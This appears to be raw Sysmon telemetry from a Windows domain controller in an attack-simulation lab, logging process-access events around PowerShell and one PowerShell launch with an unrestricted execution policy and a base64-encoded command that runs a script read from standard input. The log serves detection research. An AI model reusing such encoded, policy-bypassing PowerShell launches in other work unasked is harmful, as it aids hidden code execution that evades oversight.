10341000x80000000000000003543Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.929{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7CAC-5FA1-AE00-000000008801}4988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003542Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.929{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7CAC-5FA1-AE00-000000008801}4988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003541Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.898{D28789B6-7CAC-5FA1-AE00-000000008801}4988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_gijzh0wn.wxw.ps12020-11-03 15:52:12.898 10341000x80000000000000003540Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.882{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CAC-5FA1-AE00-000000008801}4988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003539Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.867{D28789B6-7CAC-5FA1-AB00-000000008801}42364252C:\Windows\system32\conhost.exe{D28789B6-7CAC-5FA1-AE00-000000008801}4988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003538Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.867{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003537Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.867{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003536Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.867{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003535Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.867{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003534Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.867{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003533Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.867{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003532Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.851{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003531Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.851{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003530Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.851{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003529Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.851{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CAC-5FA1-AE00-000000008801}4988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003528Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.851{D28789B6-7CAC-5FA1-AD00-000000008801}13483876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CAC-5FA1-AE00-000000008801}4988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+316032a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30aa4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30aa3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31555466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30a64997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30ac2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30aa64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30aa64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30aa635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30a982e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30aa4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30aa4407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30aa4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30aa3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31555466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30a8ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30a8a232(wow64) 154100x80000000000000003527Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.865{D28789B6-7CAC-5FA1-AE00-000000008801}4988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CAC-5FA1-2CE6-060000000000}0x6e62c0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CAC-5FA1-AD00-000000008801}1348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x80000000000000003526Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.804{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7CAC-5FA1-AD00-000000008801}1348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003525Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 